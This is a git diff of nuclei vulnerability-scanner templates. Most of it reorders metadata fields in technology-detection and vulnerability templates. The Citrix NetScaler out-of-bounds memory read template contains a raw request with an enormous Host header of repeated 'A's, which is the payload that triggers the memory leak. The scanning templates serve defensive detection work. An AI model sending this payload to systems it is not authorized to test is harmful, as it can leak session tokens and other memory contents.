status: - 200 -# digest: 4b0a00483046022100f3197c3c2036100cbbcb99bd4044647885c72fe725dff5553edfe65e1b772f7b0221009eca39999405f4dac0cb80a5acd5dec2bfea7ea2a062714d11b9afe5789ab5b3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f3197c3c2036100cbbcb99bd4044647885c72fe725dff5553edfe65e1b772f7b0221009eca39999405f4dac0cb80a5acd5dec2bfea7ea2a062714d11b9afe5789ab5b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/yapi-detect.yaml b/http/technologies/yapi-detect.yaml index 7953dc6b7d..531eeb3910 100644 --- a/http/technologies/yapi-detect.yaml +++ b/http/technologies/yapi-detect.yaml @@ -4,15 +4,15 @@ info: name: YApi Detect author: pikpikcu severity: info - metadata: - max-request: 1 - shodan-query: http.title:"YApi" - product: yapi - vendor: ymfe - tags: tech,yapi - classification: cpe: cpe:2.3:a:ymfe:yapi:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ymfe + product: yapi + shodan-query: http.title:"YApi" + tags: tech,yapi + http: - method: GET path: @@ -29,4 +29,4 @@ http: status: - 200 -# digest: 4a0a00473045022100d065fd5b007edee8b857f54125c1ad7475fbf9817a640e334a022db8b8b4e13702201cf3269e3d0dd2ecc4a51d6dcda283dbeda97f867b5e6cbbef31dcaeb31861ab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d065fd5b007edee8b857f54125c1ad7475fbf9817a640e334a022db8b8b4e13702201cf3269e3d0dd2ecc4a51d6dcda283dbeda97f867b5e6cbbef31dcaeb31861ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/yourls-detect.yaml b/http/technologies/yourls-detect.yaml index b2c9b50d7d..632aef3453 100644 --- a/http/technologies/yourls-detect.yaml +++ b/http/technologies/yourls-detect.yaml @@ -8,17 +8,17 @@ info: Detects if the target is running a YOURLS (Your Own URL Shortener) server reference: - https://github.com/YOURLS/YOURLS + classification: + cpe: cpe:2.3:a:yourls:yourls:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: yourls + product: yourls shodan-query: title:"Your Own URL Shortener" fofa-query: title="Your Own URL Shortener" - product: yourls - vendor: yourls tags: tech,yourls - classification: - cpe: cpe:2.3:a:yourls:yourls:*:*:*:*:*:*:*:* http: - method: GET path: @@ -49,4 +49,5 @@ http: regex: - 'YOURLS<\/a>([ a-z0-9.-]+)' - 'content="YOURLS([ 0-9.]+)"' -# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/zend-server-test-page.yaml b/http/technologies/zend-server-test-page.yaml index 57d33306e9..998ce0268b 100644 --- a/http/technologies/zend-server-test-page.yaml +++ b/http/technologies/zend-server-test-page.yaml @@ -4,16 +4,16 @@ info: name: Zend Server Test Page author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Zend Server Test Page" - product: zend_server vendor: zend + product: zend_server + shodan-query: title:"Zend Server Test Page" tags: tech,zend - classification: - cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4a0a0047304502201fd2dcfb4d8a21f34539ef7ddfa74825dc28f01cc2671f1f37bb192246d51c6e022100b1cddd2a25a66593730fdbf5f57e7946972b05fb24fafd75827b214cef999d1d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201fd2dcfb4d8a21f34539ef7ddfa74825dc28f01cc2671f1f37bb192246d51c6e022100b1cddd2a25a66593730fdbf5f57e7946972b05fb24fafd75827b214cef999d1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/apache/apache-nifi-rce.yaml b/http/vulnerabilities/apache/apache-nifi-rce.yaml index 383b479033..dc9f623d56 100644 --- a/http/vulnerabilities/apache/apache-nifi-rce.yaml +++ b/http/vulnerabilities/apache/apache-nifi-rce.yaml @@ -10,6 +10,8 @@ info: - https://github.com/imjdl/Apache-NiFi-Api-RCE - https://labs.withsecure.com/tools/metasploit-modules-for-rce-in-apache-nifi-and-kong-api-gateway - https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt + classification: + cpe: cpe:2.3:a:apache:nifi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -18,8 +20,6 @@ info: vendor: apache tags: packetstorm,apache,nifi,rce - classification: - cpe: cpe:2.3:a:apache:nifi:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml index a90445c7db..faf791d83a 100644 --- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml +++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml @@ -10,16 +10,16 @@ info: remediation: Update to version 13.1-51.15 or later reference: - https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory + classification: + cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-1292923998,-1166125415 - product: netscaler_gateway vendor: citrix + product: netscaler_gateway + shodan-query: http.favicon.hash:-1292923998,-1166125415 tags: citrix,netscaller,gateway,oob - classification: - cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:* http: - raw: - |+ @@ -27,6 +27,7 @@ http: Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA